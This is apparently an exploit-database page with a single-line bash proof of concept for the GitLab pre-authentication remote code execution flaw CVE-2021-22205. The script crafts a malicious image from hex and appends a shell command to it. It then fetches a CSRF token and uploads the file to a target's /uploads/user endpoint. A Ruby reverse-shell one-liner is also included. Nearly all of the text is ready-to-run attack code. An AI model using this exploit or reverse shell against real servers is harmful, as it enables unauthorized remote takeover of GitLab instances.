Share
## https://sploitus.com/exploit?id=0F2A170C-ABEB-54C3-9D07-9F1BA8554053
# GitLab-preauth-RCE_CVE-2021-22205
single line bash PoC for GitLab preauth RCE ( CVE-2021-22205 )
```bash
t="http://vuln.site";cmd='echo xxx_base64_of_reverse_shell_code_xxx |base64 -d|bash';f="1.jpg";echo 41542654464f524d000003af444a564d4449524d0000002e81000200000046000000acffffdebf992021c8914eeb0c071fd2da88e86be6440f2c7102ee49d36e95bda2c3223f464f524d0000005e444a5655494e464f0000000a00080008180064001600494e434c0000000f7368617265645f616e6e6f2e696666004247343400000011004a0102000800088ae6e1b137d97f2a89004247343400000004010ff99f4247343400000002020a464f524d00000307444a5649414e546100000150286d657461646174610a0928436f7079726967687420225c0a22202e2071787b|xxd -p -r>$f;echo -n $cmd>>$f;echo 7d202e205c0a222062202229202920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020|xxd -p -r>>$f;curl -b c -c c -XPOST $t/uploads/user -H "X-CSRF-Token: $(curl -b c -c c -s "$t/users/sign_in" |grep -Po '(?<=csrf-token" content=")([^"]*)')" -F "file=@$f"
```
code for reverse shell
```
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("127.0.0.1",8080);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
ref:
https://hackerone.com/reports/1154542